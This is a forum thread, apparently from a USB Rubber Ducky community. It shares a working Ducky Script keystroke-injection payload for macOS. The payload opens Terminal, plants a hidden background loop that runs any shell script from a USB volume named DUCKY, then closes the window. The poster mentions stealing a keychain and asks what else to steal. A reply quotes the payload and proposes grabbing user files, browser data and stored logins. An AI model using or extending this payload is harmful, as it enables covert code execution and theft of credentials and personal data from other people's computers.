Toreddo Posted February 13, 2015 Share Posted February 13, 2015 I created a pretty simple payload for Mac OSX, this is the fastest I could get it. You might want to play with some delays but my decent mac is running this just fine. It basically types in a while loop in the terminal that waits for a volume to mount named DUCKY by looking for file 'a', and then executes an SH script called 'a' (the same file). This is done to make it as short as possible. DELAY 3000 COMMAND SPACE DELAY 200 STRING terminal ENTER DELAY 200 STRING while [ ! -f /Volumes/DUCKY/a ] ; do sleep 2 ; done && sh /Volumes/DUCKY/a & ENTER STRING disown ENTER STRING exit ENTER COMMAND Q So in your 'a' file you can write any length shell script you want, it will all execute on the background. P.s. I just stole my own keychain, are there any more interesting things I could try to steal? Quote Link to comment Share on other sites More sharing options...
jujubes Posted September 25, 2015 Share Posted September 25, 2015 This looks interesting, do you think its the best approach? Have you figured out more since? I'm definitely going to test this out and see how it works. Thanks for sharing! How would you go about the keychain copying? I'd like to attempt the same, and maybe also experiment with grabbing the active User / Documents / Photo Library / Movies directories and copying them to the Ducky USB mounted section, maybe even the Chrome and Firefox favorites, stored logins, etc. Basically like a super-backup saving feature for dire situations. I created a pretty simple payload for Mac OSX, this is the fastest I could get it. You might want to play with some delays but my decent mac is running this just fine. It basically types in a while loop in the terminal that waits for a volume to mount named DUCKY by looking for file 'a', and then executes an SH script called 'a' (the same file). This is done to make it as short as possible. DELAY 3000 COMMAND SPACE DELAY 200 STRING terminal ENTER DELAY 200 STRING while [ ! -f /Volumes/DUCKY/a ] ; do sleep 2 ; done && sh /Volumes/DUCKY/a & ENTER STRING disown ENTER STRING exit ENTER COMMAND Q So in your 'a' file you can write any length shell script you want, it will all execute on the background. P.s. I just stole my own keychain, are there any more interesting things I could try to steal? Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.